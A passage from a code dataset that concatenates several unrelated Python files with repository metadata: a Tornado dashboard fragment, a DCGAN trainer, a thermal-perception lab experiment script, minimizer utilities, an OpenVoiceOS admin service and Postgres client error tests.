range(cols):\n if matrix[r][c]==1:\n matrix[r][c] = max_dist\n else:\n queue.append((r,c))\n \n while queue:\n r,c = queue.popleft()\n \n for dr,dc in deltas:\n row,col = r+dr,c+dc \n if (0<=(row) cls.cache_size:\n cls.cache = cls.cache[-cls.cache_size:]\n\n @classmethod\n def send_updates(cls, msg):\n print(\"sending message to waiters\", len(cls.waiters))\n # logging.info(\"sending message to %d waiters\", len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(msg)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def on_message(self, message):\n # logging.info(\"got message %r\", message)\n print(\"got message \", message)\n # self.write(\"
<p>current_nodeid: %s</p>
\" % message)\n VisualizeDataHandler.send_updates(message)\n\n# def boot():\n# # os.system(\"curl 127.0.0.1:8000/new_node?n=9\")\n# http_client = tornado.httpclient.AsyncHTTPClient()\n# http_client.fetch(\"http://127.0.0.1:8000/new_node?n=9\", method=\"GET\")\n\ndef main():\n global dashboard_host\n global dashboard_port\n\n parser = argparse.ArgumentParser(description=\"control description\")\n parser.add_argument('--dashboard_host', default=\"127.0.0.1\")\n parser.add_argument('--dashboard_port', default=setting.DASHBOARD_PORT)\n\n args = parser.parse_args()\n dashboard_host = args.dashboard_host\n dashboard_port = args.dashboard_port\n\n server = Application()\n server.listen(dashboard_port)\n # tornado.ioloop.IOLoop.instance().call_later(2, boot)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"EcoPoW/BitPoW","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":18190,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"36152461202","text":"import multiprocessing\nimport random\n\nfrom matplotlib import animation\n\nimport config\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torchvision.utils as vutils\nfrom data_loader import dataloader\nfrom discriminator import Discriminator\nfrom generator import Generator\nfrom torch import nn, optim\nfrom utils import weights_init\n\n\ndef main():\n # Set reproducability\n manualSeed = 123\n print(\"Random seed:\", manualSeed)\n random.seed(manualSeed)\n torch.manual_seed(manualSeed)\n\n device = torch.device(\n \"cuda:0\" if (torch.cuda.is_available() and config.NGPU > 0) else \"cpu\"\n )\n print(\"Device:\", device)\n\n # Plot some training images\n # real_batch = next(iter(dataloader))\n # plt.figure(figsize=(8, 8))\n # plt.axis(\"off\")\n # plt.title(\"Training Images\")\n # plt.imshow(\n # np.transpose(\n # vutils.make_grid(\n # real_batch[0].to(device)[:64], padding=2, normalize=True\n # ).cpu(),\n # (1, 2, 0),\n # )\n # )\n\n netG = Generator(config.NGPU).to(device)\n\n # Multi GPU\n if (device.type == \"cuda\") and (config.NGPU > 1):\n netG = torch.nn.DataParallel(netG, list(range(config.NGPU)))\n\n # Set initial weights\n netG.apply(weights_init)\n\n # print(netG)\n\n netD = Discriminator(config.NGPU).to(device)\n\n # Multi GPU\n if (device.type == \"cuda\") and (config.NGPU > 1):\n netD = torch.nn.DataParallel(netD, list(range(config.NGPU)))\n\n # Set initial weights\n netD.apply(weights_init)\n\n # print(netD)\n\n criterion = nn.BCELoss()\n\n fixed_noise = torch.randn(64, config.NZ, 1, 1, device=device)\n\n real_label = 1\n fake_label = 0\n\n optimizerD = optim.Adam(\n netD.parameters(), lr=config.LR, betas=(config.BETA1, 0.999)\n )\n optimizerG = optim.Adam(\n netG.parameters(), lr=config.LR, betas=(config.BETA1, 0.999)\n )\n\n img_list = []\n G_losses = []\n D_losses = []\n iters = 0\n\n print(\"Starting Training Loop...\")\n\n for epoch in range(config.EPOCHS):\n for i, data in enumerate(dataloader, 0):\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ## All real batch\n netD.zero_grad()\n real_cpu = data[0].to(device)\n b_size = real_cpu.size(0)\n label = torch.full((b_size,), real_label, dtype=torch.float, device=device)\n output = netD(real_cpu).view(-1)\n errD_real = criterion(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n ## All fake batch\n noise = torch.randn(b_size, config.NZ, 1, 1, device=device)\n fake = 
netG(noise)\n label.fill_(fake_label)\n output = netD(fake.detach()).view(-1)\n errD_fake = criterion(output, label)\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n optimizerD.step()\n\n # (2) Update G network: maximize log(D(G(z)))\n netG.zero_grad()\n label.fill_(real_label)\n output = netD(fake).view(-1)\n errG = criterion(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print(\n \"[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f\"\n % (\n epoch,\n config.EPOCHS,\n i,\n len(dataloader),\n errD.item(),\n errG.item(),\n D_x,\n D_G_z1,\n D_G_z2,\n )\n )\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or (\n (epoch == config.EPOCHS - 1) and (i == len(dataloader) - 1)\n ):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n plt.figure(figsize=(10, 5))\n plt.title(\"Generator and Discriminator Loss During Training\")\n plt.plot(G_losses, label=\"G\")\n plt.plot(D_losses, label=\"D\")\n plt.xlabel(\"iterations\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.show()\n\n fig = plt.figure(figsize=(8, 8))\n plt.axis(\"off\")\n ims = [[plt.imshow(np.transpose(i, (1, 2, 0)), animated=True)] for i in img_list]\n ani = animation.ArtistAnimation(\n fig, ims, interval=1000, repeat_delay=1000, blit=True\n )\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n multiprocessing.freeze_support()\n main()\n","repo_name":"RemcoGoy/PokemonGenerator","sub_path":"dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72998556054","text":"################################ Import stuff ################################\nfrom classes_thermodes import Thermode\nfrom classes_arduino import ArdUIno\nfrom classes_arduino import *\nfrom classes_colther import Zaber\nfrom classes_camera import TherCam\nfrom saving_data import *\nfrom classes_text import TextIO\nfrom grabPorts import grabPorts\nfrom classes_audio import Sound\n\nimport globals\nimport time\nimport threading\nimport random\nimport numpy as np\nimport simpleaudio as sa\n\n################################ Defining some useful functions ############################\n# To home all zabers\ndef homingZabers(zabers):\n for kzabers, vzabers in zabers.items():\n for d in vzabers:\n try:\n d.device.home()\n except:\n d.home()\n\n# Move Zabers to starting position\ndef movetostartZabers(zabers, zaber, cond):\n poses = globals.positions[zaber][cond]\n print('\\nMoving Zabers of {} to: '.format(zaber))\n print(poses)\n\n if zaber == 'non_tactile':\n zaber = 'tactile'\n\n for d, p in zip(reversed(zabers[zaber]), poses):\n try:\n d.device.move_abs(p)\n # print(d)\n except:\n d.move_abs(p)\n\n################################ Function for Experiment ############################\ndef experiment(eng):\n################################ Set constants and objects ################################\n\n globals.frames['start'][1] = 'on'\n print('All ports:')\n ports = grabPorts()\n print(ports.ports)\n ### Camera\n globals.cam = TherCam()\n globals.cam.startStream()\n\n ### Zabers\n colther1 = Zaber(1, who = 'serial')\n colther2 = Zaber(2, port = 
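The DCGAN script above applies a weights_init imported from utils whose body isn't shown. For reference, the conventional DCGAN initialization that name usually denotes -- conv weights drawn from N(0, 0.02), BatchNorm scale from N(1, 0.02) -- stated here as an assumption about the repo, not a fact:

import torch.nn as nn

def weights_init(m):
    classname = m.__class__.__name__
    if classname.find("Conv") != -1:
        nn.init.normal_(m.weight.data, 0.0, 0.02)
    elif classname.find("BatchNorm") != -1:
        nn.init.normal_(m.weight.data, 1.0, 0.02)
        nn.init.constant_(m.bias.data, 0)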
colther1, who = 'serial')\n colther3 = Zaber(3, port = colther1, who = 'serial')\n\n camera12 = Zaber(1, who = 'modem', usb_port = 2, n_modem = 1)\n camera1 = camera12.device.axis(1)\n camera2 = camera12.device.axis(2)\n camera3 = Zaber(2, port = camera12, who = 'modem', usb_port = 2, n_modem = 1)\n\n tactile12 = Zaber(1, who = 'modem', usb_port = 2, n_modem = 2)\n tactile1 = tactile12.device.axis(1)\n tactile2 = tactile12.device.axis(2)\n tactile3 = Zaber(2, port = tactile12, who = 'modem', usb_port = 2, n_modem = 2)\n\n colther = [colther3, colther2, colther1]\n camera = [camera3, camera2, camera1]\n tactile = [tactile3, tactile2, tactile1]\n\n zabers = {'colther': [colther3, colther2, colther1], 'camera': [camera3, camera2, camera1],\n 'tactile': [tactile3, tactile2, tactile1]}\n\n # Arduino\n arduino_shutter = ArdUIno(usb_port = 2, n_modem = 4)\n arduino_pressure = ArdUIno(usb_port = 1, n_modem = 2)\n\n # Beep\n beep = Sound(400, 10)\n # Homing all the Zabers\n # thread_home_zabers = threading.Thread(target = homingZabers, args = [zabers])\n # thread_shake = threading.Thread(target = shakeShutter, args = [arduino_shutter, 3])\n #\n # thread_home_zabers.start()\n # thread_shake.start()\n\n # thread_home_zabers.join()\n # thread_shake.join()\n\n homingZabers(zabers)\n shakeShutter(arduino_shutter, 3)\n\n # Data\n data = {'tactile.experimental': {'rt': [], 'temperature': [], 'response': [],'RF': []},\n 'non_tactile.experimental': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n 'tactile.control': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n 'non_tactile.control': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n }\n\n n_cond_blocks = 8\n list_trials = globals.conditions * n_cond_blocks\n random.shuffle(list_trials)\n\n n_boosts = 2\n list_boosts_trials = globals.boost * n_boosts\n\n trials = list_boosts_trials + list_trials\n random.shuffle(trials)\n\n n_training = 2\n list_training = globals.conditions * n_training\n\n n_boosts_training = 1\n list_boosts_training = globals.boost * n_boosts_training\n\n training = list_boosts_training + list_training\n random.shuffle(training)\n\n ################################ Setting up ################################\n # Number of participant\n globals.frames['n_participant'][1] = 'on'\n globals.frames['start'][1] = 'off'\n\n while globals.frames['n_participant'][1] == 'on':\n # print('looping')\n time.sleep(1)\n\n globals.frames['age'][1] = 'on'\n\n print('Number of participant: ' + str(globals.n_subj))\n # print(type(globals.n_subj))\n # Ask participant their age\n\n while globals.frames['age'][1] == 'on':\n time.sleep(1)\n\n print('Age: ' + str(globals.subj_age))\n\n ################################ FINDING MICROSPOTS ################################\n globals.frames['microspots'][1] = 'on'\n\n while globals.frames['microspots'][1] == 'on':\n time.sleep(1)\n\n # Need to move camera and get readout of skin, we can stay in this screen to monitor temp\n # finish when we are done with finding microspots\n globals.frames['zabering'][1] = 'on'\n\n globals.current_device = 'camera'\n\n thread_zaber_skin_readout = threading.Thread(target = camera12.manualConGUIsingle, args = [zabers])\n thread_zaber_skin_readout.start()\n\n while globals.frames['zabering'][1] == 'on':\n time.sleep(1)\n\n ################################ Get position for big three ########################\n globals.frames['intro_big_three'][1] = 'on'\n\n while globals.frames['intro_big_three'][1] == 'on':\n time.sleep(1)\n\n # Need to move three zabers 
simultaneously to get colther, tactile and camera well aligned\n\n globals.hidden = False\n globals.frames['zabering'][1] = 'on'\n\n globals.current_device = 'camera'\n\n thread_zabers_big_three = threading.Thread(target = camera12.manualConGUIthree, args = [zabers, arduino_shutter])\n thread_zabers_big_three.start()\n\n while globals.frames['zabering'][1] == 'on':\n time.sleep(1)\n\n globals.hidden = True\n\n # Printing saved variables\n print('\\nPosition Camera: ')\n print(globals.positions['camera'])\n\n print('Position Colther: ')\n print(globals.positions['colther'])\n\n print('Position Non-tactile: ')\n print(globals.positions['non_tactile'])\n\n print('Position Tactile: ')\n print(globals.positions['tactile'])\n\n print('Centre ROI Control: ')\n print(globals.centreROI['control'])\n\n print('Centre ROI Experimental: ')\n print(globals.centreROI['experimental'])\n\n # # ################################ Get height for tactile ##############################\n # Intro\n globals.frames['intro_tactile_height'][1] = 'on'\n\n while globals.frames['intro_tactile_height'][1] == 'on':\n time.sleep(1)\n\n globals.frames['tactile_height'][1] = 'on'\n\n movetostartZabers(zabers, 'tactile', 'experimental')\n\n globals.current_device = 'tactile'\n # Thread\n e1 = threading.Event()\n e2 = threading.Event()\n es = [e1, e2]\n\n thread_zaber_skin_readout = threading.Thread(target = tactile12.manualConGUIdouble, args = [zabers, es])\n\n thread_zaber_skin_readout.start()\n\n arduino_pressure.readFloat(0, -2, globals.pressure, es)\n\n print('\\nPosition Tactile: ')\n print(globals.positions['tactile'])\n\n ##### Set baseline temperature\n globals.frames['baseline_temp'][1] = 'on'\n # print(globals.frames['baseline_temp'][1])\n\n while globals.frames['baseline_temp'][1] == 'on':\n time.sleep(1)\n\n print('\\nBaseline temperature: ' + globals.baseline_temp)\n\n ################################ Experiment #######################################\n ### Training\n globals.frames['intro_training'][1] = 'on'\n\n while globals.frames['intro_training'][1] == 'on':\n time.sleep(1)\n\n # QUEST for training\n # Setting up 1 prior distribution and 4 QUEST algorithms\n alphas = np.arange(28, 32.01, 0.01)\n alphas_list = list(alphas)\n alphas_ll = []\n for i in alphas_list:\n alphas_ll.append(round(i, 2))\n\n alphas_ll = [float(i) for i in alphas_ll]\n\n # QUEST algorithms\n TR_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n TR_non_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n TR_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n TR_non_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n TR_dict = {'tactile.experimental': TR_tact_exp,\n 'non_tactile.experimental': TR_non_tact_exp,\n 'tactile.control': TR_tact_con,\n 'non_tactile.control': TR_non_tact_con,\n }\n\n temp_training = float(globals.baseline_temp) - 2\n\n while globals.training_boolean == 'n':\n for i in np.arange(len(training)):\n train_string = training[i][0] + '.' 
+ training[i][1]\n print(training[i][1])\n # Move zabers tactile\n movetostartZabers(zabers, training[i][0], training[i][1])\n # Move zabers camera\n movetostartZabers(zabers, 'colther', training[i][1])\n # Move zabers camera\n movetostartZabers(zabers, 'camera', training[i][1])\n\n # Injecting booster\n if len(training[i]) > 2:\n temp_training = 29\n\n # Open shutter, PID & sound\n globals.frames['fixation_cross'][1] = 'on'\n\n # Set threads\n evPID_train = threading.Event()\n # evBEEP = threading.Event()\n\n PID_train = threading.Thread(target = colther1.ROIPID, args = [zabers['colther'], temp_training, evPID_train, 20, arduino_shutter], daemon = True)\n beep_train = threading.Thread(target = beep.play, args = [evPID_train])\n\n # Start threads\n PID_train.start()\n beep_train.start()\n\n name_file_training = 'training_{}_{}_{}_{}'.format(globals.n_subj, training[i][0], training[i][1], i)\n globals.cam.PIDSavePosMeanShuFixROI(output = '../src_analysis/thermal_image/test1_14012020/{}'.format(name_file_training), r = 20., cond = training[i][1], duration = 10, event1 = evPID_train)\n\n sa.stop_all()\n\n # We get response and RT from participant\n globals.frames['response'][1] = 'on'\n globals.frames['fixation_cross'][1] = 'off'\n start_reply_train = time.time()\n\n while globals.frames['response'][1] == 'on':\n time.sleep(1)\n\n globals.frames['fixation_cross'][1] = 'on'\n\n end_reply_train = time.time()\n rt_trial_train = end_reply_train - start_reply_train\n\n if globals.answer == 'a': # YES\n response_train = 1\n elif globals.answer == 's': # NO\n response_train = 0\n\n # Get pdf for next trial\n TR_dict[train_string] = eng.quest_matlab_update(TR_dict[train_string], temp_training, response_train)\n\n #\n data_training = [rt_trial_train, temp_training, response_train, TR_dict[train_string]]\n print('Threshold trial: ')\n print(temp_training)\n\n temp_training = TR_dict[train_string]['xCurrent']\n\n print('Response: ' + globals.answer)\n print('Reaction Time: ' + str(rt_trial_train))\n homingZabers(zabers)\n\n globals.frames['fixation_cross'][1] = 'off'\n globals.frames['repeat_training'][1] = 'on'\n\n while globals.frames['repeat_training'][1] == 'on':\n time.sleep(1)\n\n ### Trials\n globals.frames['intro_trials'][1] = 'on'\n\n while globals.frames['intro_trials'][1] == 'on':\n time.sleep(1)\n\n # Set up QUEST algorithms\n RF_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n RF_non_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n RF_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n RF_non_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n RF_dict = {'tactile.experimental': RF_tact_exp,\n 'non_tactile.experimental': RF_non_tact_exp,\n 'tactile.control': RF_tact_con,\n 'non_tactile.control': RF_non_tact_con,\n }\n\n temp_trial = globals.baseline_temp - 2\n # counter = 0\n\n for i in np.arange(len(trials)): #RF['stop'] == 0:\n cond_string = trials[i][0] + '.' 
+ trials[i][1]\n print()\n # Move Zaber to position\n movetostartZabers(zabers, trials[i][0], trials[i][1])\n\n # Injecting booster\n if len(trials[i]) > 2:\n temp_trial = 29\n\n globals.frames['fixation_cross'][1] = 'on'\n\n # Open shutter and PID\n globals.frames['fixation_cross'][1] = 'on'\n\n # Set threads\n evPID = threading.Event()\n # evBEEP = threading.Event()\n\n PID = threading.Thread(target = colther1.ROIPID, args = [zabers['colther'], temp_trial, evPID, 20, arduino_shutter], daemon = True)\n beep_trial = threading.Thread(target = beep.play, args = [evPID])\n\n # Start threads\n PID.start()\n beep_trial.start()\n\n name_file = '{}_{}_{}_{}'.format(globals.n_subj, trials[i][0], trials[i][1], i)\n globals.cam.PIDSavePosMeanShuFixROI(output = '../src_analysis/thermal_image/test1_14012020/{}'.format(name_file), r = 20., cond = training[i][1], duration = 10, event1 = evPID)\n\n sa.stop_all()\n\n # We get response and RT from participant\n globals.frames['response'][1] = 'on'\n globals.frames['fixation_cross'][1] = 'off'\n start_reply = time.time()\n\n while globals.frames['response'][1] == 'on':\n time.sleep(1)\n\n globals.frames['fixation_cross'][1] = 'on'\n\n end_reply = time.time()\n rt_trial = end_reply - start_reply\n\n\n if globals.answer == 'a': # YES\n response_trial = 1\n elif globals.answer == 's': # NO\n response_trial = 0\n\n # Get pdf for next trial\n RF_dict[cond_string] = eng.quest_matlab_update(RF_dict[cond_string], temp_trial, response_trial)\n\n # Save data to data library\n data_trial = [rt_trial, temp_trial, response_trial, RF_dict[cond_string]]\n llaves_data = data.keys()\n # data[[*llaves_data][0]].keys()\n for (k,v), j in zip(data[cond_string].items(), np.arange(len(data_trial))):\n v.append(data_trial[j])\n\n temp_trial = RF_dict[cond_string]['xCurrent']\n\n print('Response: ' + globals.answer)\n print('Reaction Time: ' + rt_trial)\n homingZabers(zabers)\n\n # counter += 1\n\n # print(data)\n\n globals.frames['end'][1] = 'on'\n\n ################################ Writing data #####################################\n # Homing all the Zabers\n homingZabers(zabers)\n\n\n ### Data\n # Individual file\n saveIndv('nt_vs_t_CS_subj_{}'.format(globals.n_subj), globals.n_subj, data)\n\n # Everyone file\n apendAll('nt_vs_t_CS_ALL', globals.n_subj, data)\n\n\n ### AGE\n apendSingle('nt_vs_t_CS_AGE', globals.n_subj, globals.subj_age)\n\n apendSingle('nt_vs_t_CS_BASELINE_TEMP', globals.n_subj, globals.baseline_temp)\n","repo_name":"iezqrom/publication-cold-sensation-without-touch","sub_path":"code/data-collection/python/src_testing/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24505008681","text":"\"\"\"Utility functions for minimizers\"\"\"\n\nimport warnings\nfrom typing import Callable\nfrom inspect import getfullargspec\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.utils.validation import check_X_y, check_array, _check_y\n\nfrom .typing import Array_Nx1\n\n\nEPS = np.finfo(float).eps ** 0.5\nMETHODS = ('BFGS', 'L-BFGS-B', 'SLSQP')\n\n\nclass OneHotLabelEncoder(OneHotEncoder):\n \"\"\"Wrapper around sklearn.preprocessing.OneHotEncoder.\n\n Parameters:\n classes: [tuple] The known classes/targets in the training data.\n\n Attributes:\n n_classes_: Number of classes derived from classes argumenet.\n classes, OneHotEncoder attributes\n \"\"\"\n\n def __init__(self, classes):\n\n 
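The experiment script above runs PID control, audio, and pressure readout on separate threads coordinated through shared threading.Event objects. The bare handshake pattern in isolation (worker and stop are illustrative names):

import threading
import time

def worker(stop):
    while not stop.is_set():
        time.sleep(0.1)  # stand-in for one PID / camera / audio iteration
    print("worker stopped")

stop = threading.Event()
t = threading.Thread(target=worker, args=(stop,), daemon=True)
t.start()
time.sleep(0.5)
stop.set()   # signal shutdown instead of killing the thread
t.join()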
super().__init__(\n categories=[classes],\n drop=None,\n sparse=False,\n )\n\n self.classes = classes\n self.n_classes_ = len(classes)\n self.categories_ = [classes]\n self.n_features_in_ = 1\n self.drop_idx_ = None\n self.infrequent_categories_ = None\n self.feature_names_in_ = None\n\n def _validate_data(self, *args, **kwargs):\n\n kwargs.update(dict(ensure_2d=False))\n out = super()._validate_data(*args, **kwargs)\n\n if out.ndim == 1:\n return out.reshape(-1,1)\n return out\n\n def fit(self, *args, **kwargs):\n \"\"\"Does nothing, categories are already known.\n \"\"\"\n\n return self\n\n\nclass FilterCheckArgs:\n \"\"\"Functionality for filtering out appropriate `check_params` passed to\n BaseEstimatorABC._validate_data depending on whether `X`, `y`, or both are being validated.\n\n Parameters:\n None.\n\n Attributes:\n xy_params: [set] Parameters accepted by sklearn.utils.validation.check_X_y.\n x_params: [set] Parameters accepted by sklearn.utils.validation.check_array.\n y_params: [set] Parameters accepted by sklearn.utils.validation._check_y.\n \"\"\"\n\n def __init__(self):\n\n ignore = ['X', 'y', 'array']\n\n spec = getfullargspec(check_X_y)\n self.xy_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n spec = getfullargspec(check_array)\n self.x_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n spec = getfullargspec(_check_y)\n self.y_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n def __call__(self, val_X, val_y, args):\n \"\"\"Call functionality.\n\n Parameters:\n val_X: [bool] Whether or not `X` is being validated.\n val_y: [bool] Whether or not `y` is being validated.\n args: [dict] Keyword arguments passed to `_validate_data`.\n\n Returns:\n [dict] Filtered keyword arguments passed to `_validate_data`.\n\n Raises:\n RuntimeWarning if unrecognized keyword arguments are passed.\n \"\"\"\n\n for arg in args:\n if arg not in self.xy_params|self.x_params|self.y_params:\n warnings.warn(f'Unknown argument: {arg}', category=RuntimeWarning)\n\n if val_X and val_y:\n return {k:v for k, v in args.items() if k in self.xy_params}\n if val_X and not val_y:\n return {k:v for k, v in args.items() if k in self.x_params}\n if not val_X and val_y:\n return {k:v for k, v in args.items() if k in self.y_params}\n return {}\n\n# Initialize FilterCheckArgs as function\nfilter_check_args: Callable = FilterCheckArgs()\n\n\ndef check_weights(w: Array_Nx1, y: Array_Nx1) -> Array_Nx1:\n \"\"\"Validate that the observation weights are all positive and match the input data length.\n If no weights are passed, weights are set to 1/N for arithmetic averaging.\n\n Parameters:\n w: [ndarray] Array of observation weights.\n y: [ndarray] Array of training targets.\n\n Returns:\n [ndarray] Array of observation weights.\n\n Raises:\n ValueError if weights are not all positive and do not match input data length.\n \"\"\"\n\n if w is None:\n w = np.full(y.shape[0], 1/y.shape[0])\n else:\n w = np.asarray(w)\n if not (np.all(w>=0) and w.shape[0]==y.shape[0]):\n raise ValueError('Weights must be positive and have the same length as the input data')\n\n return w\n\n\ndef clip_probability(array):\n \"\"\"Remove infinite and NaN values and clip values arbitrarily close to 0 and 1.\n\n Parameters:\n array: [ndarray] Array to clip.\n\n Returns:\n [ndarray] Clipped array.\n\n Raises:\n None.\n \"\"\"\n\n array = np.nan_to_num(array, copy=True, nan=0.5)\n array = np.clip(array, a_min=EPS, a_max=1-EPS)\n\n return array\n\n\n
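# NOTE: hedged example of clip_probability (editor's addition), using the EPS\n# defined above: clip_probability(np.array([0.0, np.nan, 1.0])) gives roughly\n# [EPS, 0.5, 1 - EPS], which keeps log-based loss functions finite downstream.\n\n\n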
def check_loss_inputs(target, prediction,\n expected_targets=None,\n multi_output=False,\n order='C',\n allow_nd=False,\n clip_probas=False):\n \"\"\"Validate target and prediction inputs for loss functions.\n\n Parameters:\n target: [ndarray] Array of targets.\n prediction: [ndarray] Array of predictions.\n expected_targets: [set] Expected target values for classification.\n multi_output: [bool] Whether output is multi-dimensional.\n order: [str] Whether an array will be forced to be fortran or c-style.\n allow_nd: [bool] Whether to allow array.ndim > 2.\n clip_probas: [bool] Clip probabilistic predictions arbitrarily close to 0 and 1.\n\n Returns:\n [tuple] The validated (target, prediction) arrays.\n\n Raises:\n ValueError if target and prediction shapes do not match, or if `target`\n contains values not listed in `expected_targets`.\n \"\"\"\n\n target = check_array(target, ensure_2d=False, allow_nd=allow_nd, order=order)\n prediction = check_array(prediction, ensure_2d=False, allow_nd=allow_nd, order=order)\n\n if multi_output and target.ndim==1:\n target = target.reshape(-1,1)\n if multi_output and prediction.ndim==1:\n prediction = prediction.reshape(-1,1)\n if not multi_output:\n target = target.flatten()\n prediction = prediction.flatten()\n\n if clip_probas:\n prediction = clip_probability(prediction)\n\n if not target.shape == prediction.shape:\n raise ValueError('Target shape and prediction shapes do not match')\n\n if expected_targets is None:\n return target, prediction\n\n # Values in targets not in expected target values\n difference = set(np.unique(target)) - set(expected_targets)\n if len(difference) > 0:\n raise ValueError(\n f'{difference} were found in `targets` but not specified in `expected_targets`'\n )\n\n return target, prediction\n","repo_name":"willarliss/GeneralLoss","sub_path":"minimizers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"2574113807","text":"from ovos_plugin_manager.phal import find_admin_plugins\nfrom ovos_utils import wait_for_exit_signal\nfrom ovos_config import Configuration\nfrom ovos_utils.log import LOG, init_service_logger\n\nfrom ovos_PHAL import PHAL\n\n\ndef on_admin_ready():\n LOG.info('PHAL Admin is ready.')\n\n\ndef on_admin_stopping():\n LOG.info('PHAL Admin is shutting down...')\n\n\ndef on_admin_error(e='Unknown'):\n LOG.error(f'PHAL Admin failed to launch ({e}).')\n\n\ndef on_admin_alive():\n LOG.info('PHAL Admin is alive')\n\n\ndef on_admin_started():\n LOG.info('PHAL Admin is started')\n\n\nclass AdminPHAL(PHAL):\n \"\"\"\n Args:\n config (dict): PHAL admin config, usually from mycroft.conf PHAL.admin section\n bus (MessageBusClient): mycroft messagebus connection\n watchdog: (callable) function to call periodically indicating\n operational status.\n \"\"\"\n\n def __init__(self, config=None, bus=None, on_ready=on_admin_ready, on_error=on_admin_error,\n on_stopping=on_admin_stopping, on_started=on_admin_started, on_alive=on_admin_alive,\n watchdog=lambda: None, skill_id=\"PHAL.admin\", **kwargs):\n if config and \"admin\" not in config:\n config = {\"admin\": config}\n super().__init__(config, bus, on_ready, on_error, on_stopping, on_started, on_alive, watchdog, skill_id, **kwargs)\n\n def load_plugins(self):\n for name, plug in find_admin_plugins().items():\n # load the plugin only if not defined as user plugin\n # (for plugins that can be used as admin or user plugins)\n if name in self.user_config:\n LOG.debug(f\"PHAL plugin 
{name} runs as user plugin, skipping\")\n continue\n\n config = self.admin_config.get(name) or {}\n enabled = config.get(\"enabled\")\n if not enabled:\n continue # require explicit enabling by user\n if hasattr(plug, \"validator\"):\n enabled = plug.validator.validate(config)\n\n if enabled:\n try:\n self.drivers[name] = plug(bus=self.bus, config=config)\n LOG.info(f\"PHAL Admin plugin loaded: {name}\")\n except Exception:\n LOG.exception(f\"failed to load PHAL Admin plugin: {name}\")\n continue\n\n\ndef main(ready_hook=on_admin_ready, error_hook=on_admin_error, stopping_hook=on_admin_stopping):\n # config read from mycroft.conf\n # \"PHAL\": {\n # \"admin\": {\n # \"ovos-PHAL-plugin-system\": {\"enabled\": True}\n # }\n # }\n init_service_logger(\"PHAL_admin\")\n phal = AdminPHAL(on_error=error_hook, on_ready=ready_hook, on_stopping=stopping_hook)\n phal.start()\n wait_for_exit_signal()\n phal.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OpenVoiceOS/ovos-PHAL","sub_path":"ovos_PHAL/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43547241609","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport psycopg2\nimport mock\nfrom pgclient.exceptions import ErrorsRegistry as registry, PgClientError\n\n\nclass ErrorsRegistryTest(unittest.TestCase):\n def test_registry(self):\n from psycopg2 import errorcodes\n codes = {k: v for k, v in errorcodes.__dict__.items()\n if k.startswith('CLASS_')}\n\n self.assertTrue(registry.ERRORS)\n # print(set(codes.values()) - set(registry.ERRORS.keys()))\n self.assertEqual(len(codes), len(registry.ERRORS))\n for code, cls in registry.ERRORS.items():\n self.assertTrue(issubclass(cls, PgClientError))\n\n def test_get_error_class(self):\n pg_code = '42P01'\n cls = registry.get_error_class(pg_code)\n self.assertTrue(issubclass(cls, PgClientError))\n self.assertEqual(cls.CLASS_CODE, '42')\n\n def test_get_error_class_with_none_code(self):\n pg_code = None\n cls = registry.get_error_class(pg_code)\n self.assertEqual(cls, PgClientError)\n\n def test_get_error(self):\n error = mock.MagicMock(spec=psycopg2.Error)\n pg_code = '08006'\n pg_error = 'error'\n diag = 'connection_failure'\n message = 'Connection failure'\n setattr(error, 'pgcode', pg_code)\n setattr(error, 'pgerror', pg_error)\n setattr(error, 'diag', diag)\n setattr(error, 'message', message)\n instance = registry.get_error(error)\n 